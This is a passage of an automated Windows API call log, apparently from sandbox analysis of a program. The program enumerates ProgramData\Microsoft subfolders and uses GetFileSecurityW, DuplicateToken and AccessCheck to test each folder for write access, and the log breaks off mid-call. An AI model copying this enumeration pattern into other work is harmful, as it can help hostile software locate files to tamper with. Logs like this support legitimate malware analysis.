(hObject=0x33c) returned 1 [0106.216] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.216] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.216] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\Outbound\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.216] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\Outbound", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.216] GetLastError () returned 0x7a [0106.216] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\Outbound", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0xbc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281b560) returned 1 [0106.216] GetLastError () returned 0x7a [0106.216] GetCurrentThread () returned 0xfffffffe [0106.216] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.216] GetCurrentProcess () returned 0xffffffff [0106.216] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.217] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.217] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.217] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.217] CloseHandle (hObject=0x32c) returned 1 [0106.217] CloseHandle (hObject=0x344) returned 1 [0106.217] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.217] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.217] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.217] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.217] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.217] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.217] GetLastError () returned 0x7a [0106.217] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData", RequestedInformation=0x7, pSecurityDescriptor=0x571668, nLength=0x144, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571668, lpnLengthNeeded=0x281b560) returned 1 [0106.217] GetLastError () returned 0x7a [0106.217] GetCurrentThread () returned 0xfffffffe [0106.217] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.217] GetCurrentProcess () returned 0xffffffff [0106.217] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.217] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.217] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.217] AccessCheck (in: pSecurityDescriptor=0x571668, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.217] CloseHandle (hObject=0x32c) returned 1 [0106.217] CloseHandle (hObject=0x344) returned 1 [0106.217] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.217] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.218] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.218] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.218] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\StateData", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.218] GetLastError () returned 0x7a [0106.218] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\RAC\\StateData", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0xbc, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281b560) returned 1 [0106.218] GetLastError () returned 0x7a [0106.218] GetCurrentThread () returned 0xfffffffe [0106.218] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.218] GetCurrentProcess () returned 0xffffffff [0106.218] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.218] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.218] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.218] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.218] CloseHandle (hObject=0x32c) returned 1 [0106.218] CloseHandle (hObject=0x344) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.218] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.218] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.218] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.218] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.219] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Search", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.219] GetLastError () returned 0x7a [0106.219] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Search", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0x8c, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281baf8) returned 1 [0106.219] GetLastError () returned 0x7a [0106.219] GetCurrentThread () returned 0xfffffffe [0106.219] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.219] GetCurrentProcess () returned 0xffffffff [0106.219] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.219] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.220] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.220] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.220] CloseHandle (hObject=0x344) returned 1 [0106.220] CloseHandle (hObject=0x33c) returned 1 [0106.220] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.220] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.220] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0xffffffff [0106.220] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.220] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.220] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.220] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.220] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\User Account Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.220] GetLastError () returned 0x7a [0106.220] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\User Account Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0x94, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281baf8) returned 1 [0106.220] GetLastError () returned 0x7a [0106.220] GetCurrentThread () returned 0xfffffffe [0106.220] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.220] GetCurrentProcess () returned 0xffffffff [0106.220] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.220] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.220] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.220] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.220] CloseHandle (hObject=0x344) returned 1 [0106.220] CloseHandle (hObject=0x33c) returned 1 [0106.220] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.220] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.221] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.221] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.224] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.224] GetLastError () returned 0x7a [0106.224] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures", RequestedInformation=0x7, pSecurityDescriptor=0x572d58, nLength=0x148, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x572d58, lpnLengthNeeded=0x281b560) returned 1 [0106.224] GetLastError () returned 0x7a [0106.224] GetCurrentThread () returned 0xfffffffe [0106.224] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.224] GetCurrentProcess () returned 0xffffffff [0106.224] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.224] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.224] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.224] AccessCheck (in: pSecurityDescriptor=0x572d58, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.224] CloseHandle (hObject=0x32c) returned 1 [0106.224] CloseHandle (hObject=0x344) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.224] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.225] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.225] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.225] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.225] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Vault\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.226] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Vault", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.226] GetLastError () returned 0x7a [0106.226] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Vault", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x114, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281baf8) returned 1 [0106.226] GetLastError () returned 0x7a [0106.226] GetCurrentThread () returned 0xfffffffe [0106.226] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.226] GetCurrentProcess () returned 0xffffffff [0106.226] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.226] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.226] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.226] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.226] CloseHandle (hObject=0x344) returned 1 [0106.226] CloseHandle (hObject=0x33c) returned 1 [0106.226] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.226] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.226] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.226] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.226] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.226] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows Defender\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0xffffffff [0106.226] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.226] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.227] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows NT", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.227] GetLastError () returned 0x7a [0106.227] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows NT", RequestedInformation=0x7, pSecurityDescriptor=0x571700, nLength=0x8c, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x571700, lpnLengthNeeded=0x281baf8) returned 1 [0106.227] GetLastError () returned 0x7a [0106.227] GetCurrentThread () returned 0xfffffffe [0106.227] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.227] GetCurrentProcess () returned 0xffffffff [0106.227] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.227] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.227] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.227] AccessCheck (in: pSecurityDescriptor=0x571700, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.227] CloseHandle (hObject=0x344) returned 1 [0106.227] CloseHandle (hObject=0x33c) returned 1 [0106.227] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.227] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.227] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0xffffffff [0106.228] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.228] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.228] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows NT\\MSScan", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.228] GetLastError () returned 0x7a [0106.228] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\Windows NT\\MSScan", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x148, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281b560) returned 1 [0106.228] GetLastError () returned 0x7a [0106.228] GetCurrentThread () returned 0xfffffffe [0106.228] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.228] GetCurrentProcess () returned 0xffffffff [0106.228] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.228] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.228] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.228] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, 